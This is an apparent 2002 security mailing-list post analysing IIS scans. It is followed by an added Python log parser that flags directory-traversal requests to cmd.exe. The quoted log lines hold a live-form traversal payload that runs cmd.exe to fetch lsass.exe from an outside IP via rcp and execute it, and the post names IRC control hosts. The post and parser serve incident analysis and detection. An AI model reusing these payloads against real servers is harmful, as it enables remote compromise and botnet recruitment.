I can confirm these scans are appearing on the first host I checked here:

    2002-09-16 09:18:10 131.251.27.247 - W3SVC2 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+rcp+-b+64.21.95.7.lp:lsass.exe+. 401 744 96 80 - -
    2002-09-16 09:18:11 131.251.27.247 - W3SVC2 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+lsass.exe 401 744 73 80 - -

lsass.exe is and has been a longtime component of Windows (server anyway). A check finds these sizes normally:

    11,776 bytes - Windows XP
    33,552 bytes - Windows 2000 Advanced Server
    10,000 bytes - Windows NT4

I used rpc to snag a copy. Interesting output in strings includes:

    telsa5.mine.nu
    irc.logicfive.nu

Googling for the first host finds an interesting match:

    http://www.esec.dk/Nyheder/1909a2002.htm

That site mentions Microsoft IIS server, IRC, Denial-of-Service, zombie and "kumultative hotfix installeret" ["cumulative hotfix installed"], but that's about all I understand of it ;)

Actually, a closer reading seems to reveal that this may be a companion of Slapper:

    "Windows program af Slapper ormens forfatter bruges i angreb"
    ["Windows program by the Slapper worm's author is used in attacks"]

and

    "Den "Slapper Worm" der for øjeblikket hærger Apache er i kildeteksten signeret af "contem@efnet" altså den samme forfatter eller gruppe."
    ["The "Slapper Worm" currently ravaging Apache is signed in the source code by "contem@efnet", i.e. the same author or group."]

Can anyone translate and shed a little more light on this?

Mike

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
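The log lines above are IIS W3C extended entries: the encoded "..%5c" in the URI stem is a directory traversal out of /scripts into winnt/system32, and the 401 status shows the server refused each request. As an added example (not part of the original post), the Python below parses such lines, decodes the stem the way a traversal check must (one or two rounds of %-decoding, backslashes folded to slashes) and reports any request that escapes its directory and reaches cmd.exe. The field order is assumed to match the post's lines; the sample log is constructed from them plus one benign request.

```python
import re
from urllib.parse import unquote

# Constructed sample in the W3C extended format seen in the post (assumed field
# order: date time c-ip cs-username s-sitename cs-method cs-uri-stem cs-uri-query
# sc-status sc-bytes cs-bytes s-port ...). Third line is a benign request.
SAMPLE_LOG = """\
2002-09-16 09:18:10 131.251.27.247 - W3SVC2 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+rcp+-b+64.21.95.7.lp:lsass.exe+. 401 744 96 80 - -
2002-09-16 09:18:11 131.251.27.247 - W3SVC2 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+lsass.exe 401 744 73 80 - -
2002-09-16 09:20:02 10.0.0.5 - W3SVC2 GET /default.htm - 200 1543 210 80 - -
"""

# A ".." path component bounded by slashes (after backslashes are folded).
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")


def normalize_path(stem: str) -> str:
    """Decode up to two rounds of %-encoding (covers %5c and double-encoded
    %255c), fold backslashes to forward slashes and lowercase the result."""
    decoded = stem
    for _ in range(2):
        once = unquote(decoded)
        if once == decoded:
            break
        decoded = once
    return decoded.replace("\\", "/").lower()


def parse_line(line: str):
    """Split one W3C line into the fields we need; None if it is too short."""
    parts = line.split()
    if len(parts) < 12:
        return None
    return {"date": parts[0], "time": parts[1], "client": parts[2],
            "method": parts[5], "stem": parts[6], "query": parts[7],
            "status": parts[8]}


def find_traversal_attempts(log_text: str) -> list:
    """Return records for requests whose decoded stem escapes its directory."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = normalize_path(rec["stem"])
        if TRAVERSAL.search(path):
            rec["normalized"] = path
            rec["cmd_exe"] = path.endswith("/cmd.exe")
            # In the logged query, '+' stands for the spaces of the command line.
            rec["command"] = rec["query"].replace("+", " ") if rec["cmd_exe"] else ""
            rec["succeeded"] = rec["status"].startswith("2")  # 401 here: denied
            hits.append(rec)
    return hits
```

A 2xx status on a hit is the case worth escalating; the post's 401s show the requests were rejected.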
This archive was generated by hypermail 2b30 : Mon Sep 23 2002 - 10:22:56 PDT